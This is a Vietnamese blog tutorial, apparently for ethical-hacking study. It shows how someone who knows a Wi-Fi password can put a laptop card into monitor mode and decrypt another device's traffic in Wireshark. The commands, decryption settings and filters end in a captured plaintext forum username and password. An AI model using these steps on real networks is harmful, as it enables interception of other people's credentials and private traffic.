01:01
zeko sock
Mô hình thực hiện của tut:
A và B đều biết password wifi của AP ( C )
Mục đích : Trên laptop của mình A sẽ sniff và giải mã các gói tin B-> C
Các bước thực hiện :
Bước 1 :
Các bạn vào :
Mã:
http://www.wireshark.org/tools/wpa-psk.htmlTrong đó :
Passphrase là password mạng wifi( đã biết)
SSID : SSID của mạng wifi ( đã biết)
Bấm vào Generate, copy lấy đoạn PSK sinh ra
Bước 2:
Tại máy của mình A mở cửa sổ terminal gõ các lệnh sau ( dưới quyền root)
Mã:
iwlist wlan0 scanningMục đích : tìm thông tin những AP gần với A, chú ý tới channel của AP C( ở đây là channel 10)
Gõ tiếp :
Mã:
iwconfig wlan0 channel 10Chuyển card mạng wifi máy A sang monitor mode, chỉ lắng nghe trên channel 10
Mã:
service NetworkManager stop
iwconfig wlan0 mode monitor
ifconfig wlan0 up
wireshakTrên cửa sổ wireshark hiện ra vào
Mã:
Edit-> Preferences->Protocols ->IEEE 802.11Check vào Enable decryption
Key #1 : wpa-psk
dòng psk đã lấy được ở bước 1)Bấm ok
Trên cửa sổ wireshark bấm vào
Mã:
Capture-> InterfacesBước 3:
Người B bắt đầu bật wifi trên mobile và vào trang :
Mã:
http://ceh.vn/@4rum/index.phpSign in với user và password của mình ( tôi sử dụng user : mylove14129, pass : abcxyz..)
Bước 4:
Người A trên cửa sổ wireshark thử filter :
Mã:
wlan.addr[0:1]==8c and eapolLọc lấy các gói tin eapol có 2 byte đầu tiên của địa chỉ MAC = 8c ( Ở đây là địa chỉ MAC của mobile B)
Ok. đã thấy các gói tin eapol giữa AP và B
Lọc tiếp :
Mã:
http.request.method==POSTChú ý tới dòng
Mã:
POST /@4rum/member.phpỞ trường :
Mã:
Line-base text data : username=mylove14129&password=abcxyz....đã thu được user và pasword B dùng để đăng nhập vào ceh
end.
Tài liệu liên quan :
Mã:
1.http://en.wikipedia.org/wiki/IEEE_802.11i-2004
2. http://www.vocal.com/secure-communication/eapol-extensible-authentication-protocol-over-lan/
3. http://www.vjol.info/index.php/JSTD/article/viewFile/2698/2688
4. http://www.hvaonline.net/hvaonline/posts/list/41009.hva
5. http://wiki.wireshark.org/DisplayFilters
6.http://wiki.wireshark.org/HowToDecrypt802.11
0 nhận xét:
Đăng nhận xét